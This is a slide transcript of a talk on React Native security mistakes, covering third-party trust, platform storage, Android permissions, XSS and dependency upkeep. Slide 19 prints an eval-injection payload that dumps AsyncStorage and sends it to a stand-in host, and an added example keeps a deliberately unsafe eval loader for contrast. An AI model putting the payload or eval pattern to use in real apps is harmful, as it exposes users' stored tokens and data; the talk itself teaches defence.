React Native Security

Julia Mezher
December 05, 2020

Transcript

  1. React Native Security
    Addressing Typical Mistakes
    JULIA POTAPENKO

  2. About me
    Security Software
    Engineer at Cossack Labs
    We help companies to protect their
    sensitive and valuable data.
    @julepka

  3. We will talk about
    Architecture
    Platforms usage
    Dependencies

  4. “Choosing React Native and its components
    means that you understand and accept
    potential security consequences.”

  5. Architecture basics
    React Native is a cross-platform solution from Facebook
    that allows writing native apps using React (JavaScript or
    TypeScript).

  6. Trusting third parties
    Apple and Google are must-haves.
    Add Facebook to the list.

  8. Trusting third parties
    Apple and Google are must-haves.
    Add Facebook to the list.
    CVE-2020-1911
    CVE-2020-1912
    CVE-2020-1913

  9. “Working with React Native, developers
    deal with security for all three platforms:
    iOS, Android and React Native.”

  10. OWASP Mobile Top 10
    #1 Improper platform usage

  11. React Native is a leaky abstraction
    @vixentael

  12. Secure Store Example
                                      iOS              Android
                                      Keychain         SharedPreferences + KeyStore
    Data stored encrypted             Yes              Yes

  13. Secure Store Example
                                      iOS              Android
                                      Keychain         SharedPreferences + KeyStore
    Data stored encrypted             Yes              Yes
    Data persists across app          Yes              No
    reinstalls
    Hardware-backed encryption        Yes              Depends on device vendor
    Data decrypted only before usage  Decrypted when   Yes
                                      device unlocked

  14. Managing Android Permissions
    Android: You can add permissions in multiple files

  15. Managing Android Permissions
    Android: You can add permissions in multiple files
    +
    React Native: It is common practice to use third-party
    solutions

  16. Managing Android Permissions
    Android: You can add permissions in multiple files
    +
    React Native: It is common practice to use third-party
    solutions
    =

  17. Managing Android Permissions
    Android: You can add permissions in multiple files
    +
    React Native: It is common practice to use third-party
    solutions
    =

    I don’t need this permission
    The app crashes if I delete it
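
    One way to see which permissions arrive through dependencies rather than through your own manifest, as an added example that is not part of the talk: compare the app's AndroidManifest.xml with the manifest Gradle produces after merging library manifests (the build output path is an assumption and varies by Android Gradle Plugin version). Both manifests below are constructed samples.

```javascript
// Added example (not from the talk): list Android permissions that reach the
// merged manifest without being declared in the app's own AndroidManifest.xml,
// i.e. permissions contributed by third-party (React Native) dependencies.
// Both manifests are constructed samples. In a real project the merged manifest
// is produced by Gradle under android/app/build/ (exact path is an assumption).

const APP_MANIFEST = `
<manifest xmlns:android="http://schemas.android.com/apk/res/android" package="com.example.app">
  <uses-permission android:name="android.permission.INTERNET" />
  <uses-permission android:name="android.permission.CAMERA" />
</manifest>`;

const MERGED_MANIFEST = `
<manifest xmlns:android="http://schemas.android.com/apk/res/android" package="com.example.app">
  <uses-permission android:name="android.permission.INTERNET" />
  <uses-permission android:name="android.permission.CAMERA" />
  <uses-permission android:name="android.permission.READ_CONTACTS" />
  <uses-permission-sdk-23 android:name="android.permission.ACCESS_FINE_LOCATION" />
</manifest>`;

// Collect every permission name from <uses-permission> and <uses-permission-sdk-23>.
function extractPermissions(manifestXml) {
  const re = /<uses-permission(?:-sdk-23)?\b[^>]*android:name="([^"]+)"/g;
  const names = new Set();
  let m;
  while ((m = re.exec(manifestXml)) !== null) names.add(m[1]);
  return names;
}

// Permissions present in the merged manifest but absent from the app's own one.
function permissionsFromDependencies(appXml, mergedXml) {
  const declared = extractPermissions(appXml);
  return [...extractPermissions(mergedXml)].filter((p) => !declared.has(p)).sort();
}

// CI gate: fail when a permission nobody reviewed sneaks in through a dependency.
function checkAgainstAllowlist(appXml, mergedXml, allowlist) {
  const unexpected = permissionsFromDependencies(appXml, mergedXml).filter(
    (p) => !allowlist.includes(p)
  );
  return { ok: unexpected.length === 0, unexpected };
}

const report = checkAgainstAllowlist(APP_MANIFEST, MERGED_MANIFEST, [
  'android.permission.READ_CONTACTS', // reviewed: needed by the contacts picker
]);
console.log(report.ok ? 'merged manifest OK' : `unexpected: ${report.unexpected.join(', ')}`);
```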

  18. Is XSS possible?
    XSS possibility is decreased by design.

  19. Is XSS possible?
    XSS possibility is decreased by design.
    XSS is still possible.
    eval()
    _reactNative.AsyncStorage.getAllKeys(function(err,result)
    {_reactNative.AsyncStorage.multiGet(result,function(err,result)
    {fetch('http://example.com/logger.php?token='+JSON.stringify(result));});});
    Steal all the data from local storage (AsyncStorage) by exploiting
    eval-based injection and accessing React Native APIs
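
    The slide's payload works because eval() runs whatever a response contains inside the same JS context that owns AsyncStorage. As an added example that is not part of the talk, the unsafe way of consuming a remote "feature flags" response (eval) is shown next to a hardened version (JSON.parse plus a strict schema); the inputs, schema and function names are constructed for this example.

```javascript
// Added example (not from the talk). Handles a remote "feature flags" response
// the unsafe way (eval) and the hardened way (JSON.parse plus a strict schema).
// Inputs, schema and function names are constructed for this example.

// UNSAFE: any code in the response body executes with the app's privileges.
function loadFlagsUnsafe(responseText) {
  return eval('(' + responseText + ')'); // vulnerable by construction
}

// Expected shape of the flags object; anything else is rejected or dropped.
const FLAG_SCHEMA = { darkMode: 'boolean', maxUploadMb: 'number', apiHost: 'string' };

// HARDENED: data stays data. JSON.parse never executes code, and the schema
// check drops unknown keys and rejects wrong types and non-object payloads.
function loadFlagsSafe(responseText) {
  const parsed = JSON.parse(responseText);
  if (parsed === null || typeof parsed !== 'object' || Array.isArray(parsed)) {
    throw new Error('flags: expected a JSON object');
  }
  const flags = {};
  for (const [key, type] of Object.entries(FLAG_SCHEMA)) {
    if (!Object.prototype.hasOwnProperty.call(parsed, key)) continue;
    if (typeof parsed[key] !== type) throw new Error(`flags: ${key} must be ${type}`);
    flags[key] = parsed[key];
  }
  return flags;
}

// Constructed samples: a benign response and one whose "data" carries code.
const GOOD_RESPONSE = '{"darkMode": true, "maxUploadMb": 25, "apiHost": "api.example.com"}';
const INJECTED_RESPONSE = '{"darkMode": true}, (globalThis.__injected = "ran")';

// With eval the comma expression runs and leaves a side effect in the app;
// the hardened loader sees malformed JSON and rejects the same text.
function demonstrate() {
  delete globalThis.__injected;
  loadFlagsUnsafe(INJECTED_RESPONSE);
  const evalRanCode = globalThis.__injected === 'ran';
  let safeRejected = false;
  try { loadFlagsSafe(INJECTED_RESPONSE); } catch (e) { safeRejected = true; }
  return { evalRanCode, safeRejected, goodFlags: loadFlagsSafe(GOOD_RESPONSE) };
}

console.log(demonstrate());
```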

  20. Apart from Source Code
    Annual BIS Reports
    US encryption export regulations
    Apple privacy rules
    User acknowledgement about private data usage

  21. “50 shades of dependencies”

  22. A typical day for React Native app developer

  23. A typical day for React Native app developer
    (It is a joke.)

  24. Monitoring dependencies

  25. Monitoring dependencies

    So many dependencies
    Additional CI work
    Integrating dependency checkers

  26. Monitoring dependencies

    So many dependencies
    Additional CI work
    One update triggers another update
    Integrating dependency checkers
    Updates may be incompatible
    What if there is no fix for vulnerability?

  27. ✅ Learn more about the issue, its scope
    ✅ Document it, make the team aware
    ✅ Monitor it and book the time for the update
    What if there is no fix?

  28. ✅ Learn more about the issue, its scope
    ✅ Document it, make the team aware
    ✅ Monitor it and book the time for the update
    What if there is no fix?
    React Native requires the team to plan time more carefully

  29. React Native requires the team to plan time more carefully
    ➡ iOS or Android update
    ➡ React Native update
    ➡ Forked version update
    ➡ Dependencies update
    ➡ Mobile app source code update

  30. Final Thoughts
    “Learn once, write anywhere.”
    “Learn once, ask mobile security
    people for help.”

  31. Where to go next
    My React Native Security Article
    https://www.cossacklabs.com/blog/react-native-app-security.html
    React Native Security Guide
    https://reactnative.dev/docs/security

  32. Thank You!
    @julepka